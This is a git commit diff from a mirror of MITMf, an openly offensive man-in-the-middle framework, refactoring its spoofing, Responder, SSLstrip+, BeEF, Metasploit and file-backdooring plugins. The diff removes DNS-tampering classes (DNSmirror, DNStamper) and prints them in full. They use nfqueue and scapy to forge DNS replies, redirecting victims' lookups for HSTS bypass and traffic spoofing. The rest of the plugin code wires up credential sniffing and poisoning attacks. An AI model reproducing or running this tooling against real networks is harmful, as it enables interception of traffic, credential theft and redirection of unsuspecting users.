github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-20 13:33:30 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge branch 'master' of github.com:byt3bl33d3r/MITMf into v0.9.6

Browse source
This commit is contained in:
byt3bl33d3r 2015-04-10 15:57:17 +02:00
commit eb7e797ded
20 changed files with 230 additions and 247 deletions
Download patch file Download diff file Expand all files Collapse all files

2
plugins/AppCachePoison.py
View file

@ -44,6 +44,8 @@ class AppCachePlugin(Plugin):
self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance()
self.urlMonitor.setAppCachePoisoning()
try:
self.config = options.configfile['AppCachePoison']
except Exception, e:

3
plugins/BeefAutorun.py
View file

@ -66,7 +66,8 @@ class BeefAutorun(Inject, Plugin):
if not beef.login(beefconfig['user'], beefconfig['pass']):
sys.exit("[-] Error logging in to BeEF!")
print "| |_ Mode: %s" % self.Mode
self.output.append("Mode: %s" % self.Mode)
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
t.setDaemon(True)
t.start()

2
plugins/FilePwn.py
View file

@ -124,6 +124,8 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
self.output.append("BDFProxy by midnite_runr online")
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True

2
plugins/JavaPwn.py
View file

@ -72,7 +72,7 @@ class JavaPwn(BrowserProfiler, Plugin):
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
print "| |_ Connected to Metasploit v%s" % version
self.output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")

4
plugins/Responder.py
View file

@ -47,10 +47,10 @@ class Responder(Plugin):
except Exception, e:
sys.exit('[-] Error parsing config for Responder: ' + str(e))
print "| |_ NBT-NS, LLMNR & MDNS Responder v%s by Laurent Gaffie online" % RESP_VERSION
self.output.append("NBT-NS, LLMNR & MDNS Responder v%s by Laurent Gaffie online" % RESP_VERSION)
if options.Analyse:
print '| |_ Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned'
self.output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
start_responder(options, config)

85
plugins/SSLstrip+.py
View file

@ -25,16 +25,13 @@ import logging
from plugins.plugin import Plugin
from core.utils import SystemConfig
from core.sslstrip.URLMonitor import URLMonitor
from core.wrappers.nfqueue import Nfqueue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
from core.wrappers.protocols import _DNS
class HSTSbypass(Plugin):
name = 'SSLstrip+'
optname = 'hsts'
desc = 'Enables SSLstrip+ for partial HSTS bypass'
version = "0.3"
version = "0.4"
has_opts = False
req_root = True
@ -50,84 +47,16 @@ class HSTSbypass(Plugin):
if not options.manualiptables:
SystemConfig.iptables.DNS(1)
self.dns = DNSmirror(1)
self.dns.hstscfg = config
self.dns.start()
self.dns = _DNS.getInstance()
self.dns.enableHSTS(config)
print "| |_ SSLstrip+ by Leonardo Nve running"
self.output.append("SSLstrip+ by Leonardo Nve running")
URLMonitor.getInstance().setHstsBypass(config)
def finish(self):
self.dns.stop()
if _DNS.checkInstance() is True:
_DNS.getInstance().stop()
if not self.manualiptables:
SystemConfig.iptables.Flush()
class DNSmirror(Nfqueue):
hstscfg = None
def callback(self, payload):
try:
#logging.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
for k,v in self.hstscfg.iteritems():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
def modify_dns(self, payload, pkt, ip):
try:
mpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
mpkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
for i in ip:
mpkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
logging.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(mpkt))
payload.accept()
except Exception, e:
print "Exception occurred while modifying DNS: " + str(e)
def resolve_domain(self, domain):
try:
logging.debug("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips
except Exception:
logging.info("Error resolving " + domain)

2
plugins/Sniffer.py
View file

@ -66,7 +66,7 @@ class Sniffer(Plugin):
n = NetCreds()
#if not self.parse:
print "| |_ Net-Creds online"
self.output.append("Net-Creds online")
t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,))
t.setDaemon(True)
t.start()

56
plugins/Spoof.py
View file

@ -23,8 +23,7 @@ import sys
from core.utils import SystemConfig
from core.sslstrip.DnsCache import DnsCache
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
from core.wrappers.nfqueue import Nfqueue
from core.wrappers.protocols import _ARP, _DHCP, _ICMP, _DNS
from plugins.plugin import Plugin
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
@ -34,7 +33,7 @@ class Spoof(Plugin):
name = "Spoof"
optname = "spoof"
desc = "Redirect/Modify traffic using ICMP, ARP or DHCP"
version = "0.5"
version = "0.6"
has_opts = True
req_root = True
@ -100,11 +99,8 @@ class Spoof(Plugin):
for domain, ip in self.dnscfg.iteritems():
dnscache.cacheResolution(domain, ip)
dns = DNStamper(0)
dns.dnscfg = self.dnscfg
self.protocolInstances.append(dns)
self.dns = _DNS.getInstance()
self.dns.enableDNS(self.dnscfg)
SystemConfig.setIpForwarding(1)
@ -130,48 +126,10 @@ class Spoof(Plugin):
for protocol in self.protocolInstances:
protocol.stop()
if _DNS.checkInstance() is True:
_DNS.getInstance().stop()
if not self.manualiptables:
SystemConfig.iptables.Flush()
SystemConfig.setIpForwarding(0)
class DNStamper(Nfqueue):
dnscfg = None
def callback(self, payload):
try:
logging.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
if pkt.haslayer(DNSQR):
logging.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
for k, v in self.dnscfg.iteritems():
if k == pkt[DNSQR].qname[:-1]:
self.modify_dns(payload, pkt, v)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
def modify_dns(self, payload, pkt, ip):
try:
mpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
mpkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(mpkt))
payload.accept()
except Exception, e:
print "Exception occurred while modifying DNS: " + str(e)

10
plugins/plugin.py
View file

@ -5,11 +5,13 @@ can get called during the MITM attack.
class Plugin(object):
name = "Generic plugin"
optname = "generic"
desc = ""
name = "Generic plugin"
optname = "generic"
desc = ""
implements = []
has_opts = False
output = []
has_opts = False
req_root = False
def __init__(self):
'''Called on plugin instantiation. Probably don't need this'''